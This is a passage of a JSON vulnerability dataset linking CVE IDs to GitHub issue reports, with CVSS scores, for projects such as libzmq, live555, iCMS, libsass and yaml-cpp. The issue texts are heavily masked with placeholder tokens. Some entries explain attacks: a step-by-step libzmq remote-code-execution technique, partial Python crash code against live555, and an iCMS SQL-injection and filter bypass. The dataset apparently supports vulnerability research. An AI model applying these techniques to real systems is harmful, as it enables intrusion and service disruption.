  42960. "description": "\u540e\u53f0\u4efb\u610f\u6587\u4ef6\u5220\u9664\u6f0f\u6d1e. APITAG APITAG FILETAG \u8fdb\u5165delete\u65b9\u6cd5\u4e2d\uff0c\u5f53\u4e0d\u662fzip\u7ed3\u5c3e\u65f6\u4f1a\u8ba4\u4e3a\u662f\u6587\u4ef6\u5939 FILETAG APITAG FILETAG \u65b9\u6cd5\u4e2d\u53ea\u5bf9\u662f\u4e0d\u662f\u6587\u4ef6\u5939\u505a\u4e86\u6821\u9a8c\uff0c\u6700\u540e\u8fdb\u5165\u4e86rmdir\u65b9\u6cd5\u4e2d \u70b9\u51fb\u5220\u9664 FILETAG \u6293\u5305\u4fee\u6539 FILETAG \u6210\u529f\u5220\u9664 FILETAG",
  42961. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42962. "severity": "HIGH",
  42963. "baseScore": 7.5,
  42964. "impactScore": 3.6,
  42965. "exploitabilityScore": 3.9
  42966. },
  42967. {
  42968. "CVE_ID": "CVE-2019-6132",
  42969. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/357",
  42970. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/357",
  42971. "Repo_new": "axiomatic-systems/bento4",
  42972. "Issue_Created_At": "2019-01-10T17:00:31Z",
  42973. "description": "memory leaks in APITAG there is memory leaks in APITAG ./mp NUMBERTAG aac poc /dev/null APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG c NUMBERTAG a5 in APITAG APITAG &) PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG PATHTAG NUMBERTAG e NUMBERTAG cb in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ddaa0 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG d6aa5 in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG d in APITAG APITAG PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG e0 in operator new FILETAG",
  42974. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42975. "severity": "HIGH",
  42976. "baseScore": 7.5,
  42977. "impactScore": 3.6,
  42978. "exploitabilityScore": 3.9
  42979. },
  42980. {
  42981. "CVE_ID": "CVE-2019-6135",
  42982. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/104",
  42983. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/104",
  42984. "Repo_new": "mz-automation/libiec61850",
  42985. "Issue_Created_At": "2019-01-11T12:32:48Z",
  42986. "description": "Memory leak in goose_publisher_example.c. Hi team, There are multiple memory leaks in APITAG Snip FILETAG CODETAG Memory leaks ERRORTAG",
  42987. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42988. "severity": "HIGH",
  42989. "baseScore": 7.5,
  42990. "impactScore": 3.6,
  42991. "exploitabilityScore": 3.9
  42992. },
  42993. {
  42994. "CVE_ID": "CVE-2019-6135",
  42995. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/103",
  42996. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/103",
  42997. "Repo_new": "mz-automation/libiec61850",
  42998. "Issue_Created_At": "2019-01-11T10:26:24Z",
  42999. "description": "Memory leaks in mms_mapping.c & mms_value.c. Hi team, There are multiple memory leaks in APITAG and APITAG Snip FILETAG ERRORTAG Snip FILETAG ERRORTAG Memory leaks ERRORTAG",
  43000. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43001. "severity": "HIGH",
  43002. "baseScore": 7.5,
  43003. "impactScore": 3.6,
  43004. "exploitabilityScore": 3.9
  43005. },
  43006. {
  43007. "CVE_ID": "CVE-2019-6136",
  43008. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/105",
  43009. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/105",
  43010. "Repo_new": "mz-automation/libiec61850",
  43011. "Issue_Created_At": "2019-01-11T12:36:38Z",
  43012. "description": "Memory leak in sv_subscriber.c. Hi team, There are multiple memory leaks in APITAG Snip FILETAG CODETAG Memory leaks ERRORTAG",
  43013. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43014. "severity": "HIGH",
  43015. "baseScore": 7.5,
  43016. "impactScore": 3.6,
  43017. "exploitabilityScore": 3.9
  43018. },
  43019. {
  43020. "CVE_ID": "CVE-2019-6137",
  43021. "Issue_Url_old": "https://github.com/mz-automation/lib60870/issues/39",
  43022. "Issue_Url_new": "https://github.com/mz-automation/lib60870/issues/39",
  43023. "Repo_new": "mz-automation/lib60870",
  43024. "Issue_Created_At": "2019-01-11T12:49:26Z",
  43025. "description": "Memory leak in link_layer.c. Hi team, There is a memory leak in APITAG Snip FILETAG APITAG Memory leak ERRORTAG",
  43026. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43027. "severity": "HIGH",
  43028. "baseScore": 7.5,
  43029. "impactScore": 3.6,
  43030. "exploitabilityScore": 3.9
  43031. },
  43032. {
  43033. "CVE_ID": "CVE-2019-6245",
  43034. "Issue_Url_old": "https://github.com/svgpp/svgpp/issues/70",
  43035. "Issue_Url_new": "https://github.com/svgpp/svgpp/issues/70",
  43036. "Repo_new": "svgpp/svgpp",
  43037. "Issue_Created_At": "2019-01-12T11:41:38Z",
  43038. "description": "4 bugs found in svgpp. bug1: an oob read bug description A type confusion bug lead to out of bound read in PATHTAG APITAG should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride. This bug may be used in info leak. poc URLTAG asan URLTAG details The crash happened in PATHTAG URLTAG Looks like type confusion. APITAG should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride This is a out of bound read bug. bug2: a heap buffer overflow bug description An heap buffer overflow bug in svgpp_agg_render which may lead to code execution. In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to the process of loop writing. Each call will write a piece of heap data, and multiple calls will overwrite the data in the heap. poc URLTAG asan URLTAG details here is a heap overflow here, the specific function call process is as follows: APITAG > APITAG Multiple calls in a loop > APITAG > APITAG In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to the process of loop writing. Each call will write a piece of heap data, and multiple calls will overwrite the data in the heap. URLTAG In the render_scanlines_aa_solid function, there is no explicit restriction on the 'for' loop. After calling blend_hline multiple times, it causes a heap overflow. This bug is also found in agg_pixfmt_rgb.h, agg_pixfmt_rgb_packed.h, agg_pixfmt_rgba.h, agg_pixfmt_transposer.h. bug3: a stack overflow bug description in the function agg::cell_aa::not_equal, dx is assigned to NUMBERTAG if dx >= dx_limit, which is NUMBERTAG APITAG = dx_limit, which is NUMBERTAG poly_subpixel_shift). This function will call itself recursively. There will be a situation when NUMBERTAG always bigger than dx_limit during the recursion. That's how the stack overflow happened. bug4: a oob read bug description After calling gil::get_color function in the boost library, the return code is used as an address. Thus it caused an Violation Access. This may lead to an out of bound read. poc URLTAG asan URLTAG details CODETAG After calling gil::get_color function in the boost library, the return code is used as an address. Thus it caused an Violation Access.",
  43039. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43040. "severity": "HIGH",
  43041. "baseScore": 8.8,
  43042. "impactScore": 5.9,
  43043. "exploitabilityScore": 2.8
  43044. },
  43045. {
  43046. "CVE_ID": "CVE-2019-6250",
  43047. "Issue_Url_old": "https://github.com/zeromq/libzmq/issues/3351",
  43048. "Issue_Url_new": "https://github.com/zeromq/libzmq/issues/3351",
  43049. "Repo_new": "zeromq/libzmq",
  43050. "Issue_Created_At": "2019-01-08T14:15:33Z",
  43051. "description": "Remote code execution vulnerability. Bug details In APITAG , the attacker can provide an APITAG of his choosing: ERRORTAG Then, in APITAG , a comparison is performed to check if this peer supplied APITAG is within the bounds of the currently allocated block of memory: ERRORTAG This is inadequate because a very large APITAG will overflow the pointer ( APITAG ). In other words, the comparison will compute as 'false' even though APITAG bytes don't fit in the currently allocated block. Exploit details Now that APITAG has been set to a very high value, the attacker is allowed to send this amount of bytes, and libzmq will copy it to its internal buffer without any further checks. This means that it's possible to write beyond the bounds of the allocated space. However, for the exploit this is not necessary to corrupt memory beyond the buffer proper. As it turns out, the space the attacker is writing to is immediately followed by a APITAG block: ERRORTAG So the memory layout is such that the receive buffer is immediately followed by data , then size , then ffn , then hint , then refcnt . Note that the receive buffer + the APITAG is a single, solid block of memory; by overwriting beyond the designated receive buffer's bounds, no dlmalloc state variables in memory (like bk , fd ) are corrupted (or, in other words, it wouldn't trigger APITAG This means that the attacker can overwrite all these members with arbitrary values. ffn is a function pointer, that upon connection closure, is called with two parameters, data and hint . This means the attacker can call an arbitrary function/address with two arbitrary parameters. In my exploit, I set ffn to the address of strcpy , set the first parameter to somewhere in the executable's .data section, and the second parameter to the address of the character I want to write followed by a NULL character. 
So for instance, if i want to write a 'g' character, I search the binary for an occurrence of 'g NUMBERTAG and use this address as the second value to my strcpy call. For each character of the command I want to execute on the remote machine, I make a separate request to write that character to the .data section. So if I want to execute 'gnome calculator', I first write a 'g', then a 'n', then an 'o', and so on, until the full 'gnome calculator' string is written to .data. In the next request, I overwrite the 'data' member of APITAG with the address of the .data section (where now APITAG resides), set the ffn member to the system libc function, and hint to NULL. In effect, this calls APITAG , by which this command is executed on the remote machine. Exploit The following is a self exploit, that demonstrates the exploit flow as explained above. ERRORTAG Notes Crucial to this exploit is knowing certain addresses, like strcpy and system , though the address of strcpy could be replaced with any executable location that contains APITAG or anything else that moves APITAG to APITAG , and system might be replaced with code that executes the string at rsi . I did not find any other vulnerabilities in libzmq, but if there is any information leaking vulnerability in libzmq, or the application that uses it, that would allow the attacker to calculate proper code offsets, this would defeat ASLR. Resolution Resolution of this vulnerability must consist of preventing pointer arithmetic overflow in APITAG .",
  43052. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  43053. "severity": "HIGH",
  43054. "baseScore": 8.8,
  43055. "impactScore": 5.9,
  43056. "exploitabilityScore": 2.8
  43057. },
  43058. {
  43059. "CVE_ID": "CVE-2019-6256",
  43060. "Issue_Url_old": "https://github.com/rgaufman/live555/issues/19",
  43061. "Issue_Url_new": "https://github.com/rgaufman/live555/issues/19",
  43062. "Repo_new": "rgaufman/live555",
  43063. "Issue_Created_At": "2019-01-14T02:37:30Z",
  43064. "description": "There is a Denial of service attack issue that can cause program to crash in LIVE NUMBERTAG Media Server version NUMBERTAG ISSUE DESCRIPTION ================= The project website : URLTAG I found a new way to make APITAG crash in lastest version NUMBERTAG when RTSP over HTTP tunneling is supported. I only need to send two HTTP requests in one TCP connection. The problem occurrs in APITAG , it calls APITAG If I send a HTTP GET packet with a specific APITAG firstly, then I send a HTTP POST packet with this APITAG in the same TCP connection. APITAG will call a error virtual function pointer in APITAG APITAG and the pointer value comes from heap which may control. Attack APITAG python code\uff1a from socket import target_ip = REMOTE_SERVER_IP target_port NUMBERTAG or NUMBERTAG tcp = socket(AF_INET,SOCK_STREAM) APITAG http_request_GET = '''GET / PATHTAG x sessioncookie: AAAAABBBBBB Accept: application/text ''' http_request_POST = '''POST / PATHTAG x sessioncookie: AAAAABBBBBB Accept: application/text This is test data ''' APITAG data = APITAG APITAG data = APITAG APITAG You can just build a test demo according to URLTAG and attack the bin APITAG for verification. IMPACT ====== It will cause dos attack and potential remote command execution in version NUMBERTAG I verified) , even all earlier versions APITAG is just my unverified guess).",
  43065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43066. "severity": "CRITICAL",
  43067. "baseScore": 9.8,
  43068. "impactScore": 5.9,
  43069. "exploitabilityScore": 3.9
  43070. },
  43071. {
  43072. "CVE_ID": "CVE-2019-6259",
  43073. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/47",
  43074. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/47",
  43075. "Repo_new": "idreamsoft/iCMS",
  43076. "Issue_Created_At": "2019-01-10T08:16:20Z",
  43077. "description": "iCMS NUMBERTAG Has A SQLi vulnerability in FILETAG . The vulnerability is in background APITAG In line NUMBERTAG in this code ,we can contol APITAG if($_POST['_data_id']){ $_data_id = APITAG $_data_id = json_decode($_data_id,true); $_count = count($_data_id); } We can post data and due to APITAG ,we alse can post a ' successfully. In line NUMBERTAG if(is_array($_data_id)){ $dkey = array_search($adid, $_data_id); if($dkey!==false && $_chapter){//\u64a4\u6d88\u7ae0\u8282\u65f6 unset($_data_id[$dkey]); //\u5220\u9664\u7ae0\u8282 if($_data_id)foreach ($_data_id as $_id) { $_id && article::del_data($_id,'id'); } } } If APITAG is a arary , APITAG , APITAG has a value that we can send APITAG to APITAG In FILETAG public static function del_data($id,$f='aid'){ iDB::query(\"DELETE FROM APITAG WHERE APITAG ='$id'\"); } And the ERRORTAG used in ERRORTAG in line NUMBERTAG APITAG we can find that APITAG ,we don't know the APITAG ,but we can post a many data to bypass this ,like APITAG And the APITAG , APITAG ,we can send chapter NUMBERTAG to bypass. so that the final payload is CODETAG And another very very very very very import problem is that in FILETAG , APITAG but in APITAG use APITAG ,but this place use APITAG of course return ture ,that mean this WAF in background is no any use!!!!!!!!!!!!so that I can use sleep NUMBERTAG and continue injecting. author by leo. EMAILTAG .cn",
  43078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43079. "severity": "CRITICAL",
  43080. "baseScore": 9.8,
  43081. "impactScore": 5.9,
  43082. "exploitabilityScore": 3.9
  43083. },
  43084. {
  43085. "CVE_ID": "CVE-2019-6284",
  43086. "Issue_Url_old": "https://github.com/sass/libsass/issues/2816",
  43087. "Issue_Url_new": "https://github.com/sass/libsass/issues/2816",
  43088. "Repo_new": "sass/libsass",
  43089. "Issue_Created_At": "2019-01-14T06:46:57Z",
  43090. "description": "APITAG heap buffer overflow PATHTAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ). A heap buffer overflow in APITAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: libsass NUMBERTAG sassc NUMBERTAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG ef bp NUMBERTAG ffe NUMBERTAG ea NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ea NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG ee in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG d3a in char const APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const 
APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in char const APITAG APITAG APITAG APITAG APITAG APITAG APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG c2c in APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG &(char const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in char const APITAG APITAG &(char const APITAG const )), APITAG APITAG const ) PATHTAG NUMBERTAG dee in APITAG const ) PATHTAG NUMBERTAG ce2 in char const APITAG const ) PATHTAG NUMBERTAG ce2 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG f NUMBERTAG e in APITAG PATHTAG NUMBERTAG d NUMBERTAG e in APITAG PATHTAG NUMBERTAG bc1b in APITAG PATHTAG NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG b3e in APITAG PATHTAG NUMBERTAG d9b in APITAG PATHTAG NUMBERTAG fa3d2 in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f in APITAG PATHTAG NUMBERTAG ce NUMBERTAG in APITAG PATHTAG NUMBERTAG ce NUMBERTAG in APITAG PATHTAG NUMBERTAG f8c3b in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG 
PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG fdf NUMBERTAG f2c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG fdf NUMBERTAG f2c NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in char const APITAG &(char const APITAG const APITAG const )), &(char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) Shadow bytes around the buggy address NUMBERTAG c0e7fff7fb NUMBERTAG c0e7fff7fc NUMBERTAG c0e7fff7fd NUMBERTAG c0e7fff7fe NUMBERTAG c0e7fff7ff NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container 
overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  43091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43092. "severity": "MEDIUM",
  43093. "baseScore": 6.5,
  43094. "impactScore": 3.6,
  43095. "exploitabilityScore": 2.8
  43096. },
  43097. {
  43098. "CVE_ID": "CVE-2019-6285",
  43099. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/660",
  43100. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/660",
  43101. "Repo_new": "jbeder/yaml-cpp",
  43102. "Issue_Created_At": "2019-01-14T07:58:28Z",
  43103. "description": "Stack Overflow in APITAG (). Stack Overflow in APITAG () position\uff1a code URLTAG FILETAG To reproduce: APITAG gdb: Program received signal SIGSEGV, Segmentation fault. APITAG ASAN: ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG bf6a8fc0 (pc NUMBERTAG e3e3 bp NUMBERTAG bf6a NUMBERTAG e8 sp NUMBERTAG bf6a8fb0 T NUMBERTAG e3e2 ( PATHTAG NUMBERTAG fde8 ( PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG b8 ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG NUMBERTAG d NUMBERTAG fc ( PATHTAG NUMBERTAG d NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG dfdc9 ( PATHTAG ) SUMMARY: APITAG stack overflow ( PATHTAG NUMBERTAG ABORTING",
  43104. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43105. "severity": "MEDIUM",
  43106. "baseScore": 6.5,
  43107. "impactScore": 3.6,
  43108. "exploitabilityScore": 2.8
  43109. },
  43110. {
  43111. "CVE_ID": "CVE-2019-6286",
  43112. "Issue_Url_old": "https://github.com/sass/libsass/issues/2815",
  43113. "Issue_Url_new": "https://github.com/sass/libsass/issues/2815",
  43114. "Repo_new": "sass/libsass",
  43115. "Issue_Created_At": "2019-01-14T06:39:46Z",
  43116. "description": "APITAG heap buffer overflow PATHTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ). A heap buffer overflow in APITAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: APITAG \u3001 APITAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ba at pc NUMBERTAG bp NUMBERTAG fffe NUMBERTAG bc NUMBERTAG sp NUMBERTAG fffe NUMBERTAG bc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ba thread T NUMBERTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) PATHTAG NUMBERTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const ) PATHTAG NUMBERTAG in char const APITAG const APITAG const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG 
NUMBERTAG f NUMBERTAG ef NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG ba is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG ef NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in char const APITAG const APITAG const )), &(char const APITAG const ))>(char const , char const ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  43117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43118. "severity": "MEDIUM",
  43119. "baseScore": 6.5,
  43120. "impactScore": 3.6,
  43121. "exploitabilityScore": 2.8
  43122. },
  43123. {
  43124. "CVE_ID": "CVE-2019-6293",
  43125. "Issue_Url_old": "https://github.com/westes/flex/issues/414",
  43126. "Issue_Url_new": "https://github.com/westes/flex/issues/414",
  43127. "Repo_new": "westes/flex",
  43128. "Issue_Created_At": "2019-01-09T07:06:10Z",
  43129. "description": "Stack Consumption Problem Caused By the mark_beginning_as_normal Function Making Recursive Calls to Itself. Hi there, An issue was discovered in function mark_beginning_as_normal in nfa.c, as distributed in fle NUMBERTAG There is a stack exhaustion problem caused by the mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of ' ' characters. Here is the POC file. Please use the \u201c./flex $POC\u201d to reproduce the bug. APITAG $POC\u201d The ASAN dumps the stack trace as follows: ERRORTAG",
  43130. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43131. "severity": "MEDIUM",
  43132. "baseScore": 5.5,
  43133. "impactScore": 3.6,
  43134. "exploitabilityScore": 1.8
  43135. },
  43136. {
  43137. "CVE_ID": "CVE-2019-6294",
  43138. "Issue_Url_old": "https://github.com/TeamEasy/EasyCMS/issues/8",
